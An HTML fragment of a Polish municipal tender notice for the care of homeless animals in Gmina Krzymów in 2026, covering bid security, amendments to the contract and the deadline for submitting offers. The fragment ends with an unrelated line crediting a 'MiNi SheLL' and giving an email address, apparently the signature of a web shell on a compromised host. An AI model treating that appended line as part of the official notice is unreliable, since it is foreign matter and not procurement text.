Zamawiającego<br/>w banku: BS Konin O/Krzymów nr konta: 34 8530 0000 0000 5151 2000 0003<br/>W tytule przelewu należy podać znak sprawy i nazwę postępowania: „Wadium - Opieka nad bezdomnymi zwierzętami z<br/>terenu Gminy Krzymów w 2026 roku (RI.271.60.2025)”.<br/>5. Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania<br/>ofert (decyduje data i godzina wpływu na rachunek bankowy Zamawiającego).<br/>6. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>a) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być: Gmina Krzymów, ul. Kościelna 2, 62-513<br/>Krzymów,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>c) kwotę gwarancji/poręczenia,<br/>d) termin ważności gwarancji/poręczenia,<br/>e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo,<br/>na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98ust. 6 ustawy Pzp.<br/>7. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> − Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>− Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>− W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o zamówienie jako najkorzystniejszej, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego - umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści umowy wymagają zachowania formy pisemnej pod rygorem nieważności.<br/>2. Strony dopuszczają dokonywanie zmian niniejszej umowy i zgodnie z art. 454, art. 455 ustawy Prawo zamówień<br/>publicznych.<br/>3. Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt 2- 4 i ust. 2 ustawy Pzp, Zamawiający na podstawie art. 455<br/>ust. 1 pkt 1 ustawy Pzp dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania<br/>umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>a) zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub<br/>świadczenia Stron;<br/>b) wystąpienie następstw siły wyższej, niezależnej od Zamawiającego i Wykonawcy,<br/>a której nie można było przewidzieć i która nie pozwala na kontynuację usług będących przedmiotem umowy, np.<br/>wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w<br/>szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych<br/>rozmiarach;<br/>c) wprowadzenia przepisów lub zmian przepisów prawa powszechnie obowiązującego mających istotny wpływ na<br/>wykonywanie niniejszej umowy,<br/>d) działania osób trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy<br/>którejkolwiek ze stron;<br/>e) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub<br/>Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.<br/>4. O wystąpieniu okoliczności mogących wpłynąć na zmianę Strony umowy poinformują się w formie pisemnej.<br/>Zamawiający lub Wykonawca w terminie do 10 dni od dnia złożenia przez drugą stronę wniosku oceni, czy wykazano<br/>rzeczywisty wpływ zmian, o których mowa w ust. 3. Strony zastrzegają sobie możliwość wezwania Strony wnioskującej do<br/>przedłożenia dodatkowych dokumentów czy wyliczeń do złożonego wniosku. W przypadku zaakceptowania wniosku Strony<br/>wyznaczą datę podpisania aneksu do umowy.<br/>5. Zamawiający przewiduje również możliwość dokonania istotnych zmian postanowień zawartej umowy w zakresie zmiany<br/>wysokości wynagrodzenia, o którym mowa w § 4 ust. 1, w przypadku:<br/>a) zmiany stawki podatku od towarów;<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie Ustawy z dnia 10 października 2002 r.<br/>o minimalnym wynagrodzeniu za pracę (Dz. U. z 2024, poz. 1773 ze zm.);<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne;<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018r. o pracowniczych planach kapitałowych.<br/>Ze względu na ograniczoną ilość znaków pozostałe zapisy znajdują się w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-28 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W celu złożenia oferty wykonawca powinien zarejestrować/zalogować się na Platformie zakupowej oraz postępując zgodnie z instrukcją złożyć ofertę w systemie za pośrednictwem „Formularza do składania ofert” dostępnego na Platformie zakupowej pod adresem: https://platformazakupowa.pl/pn/ug_krzymow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-28 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com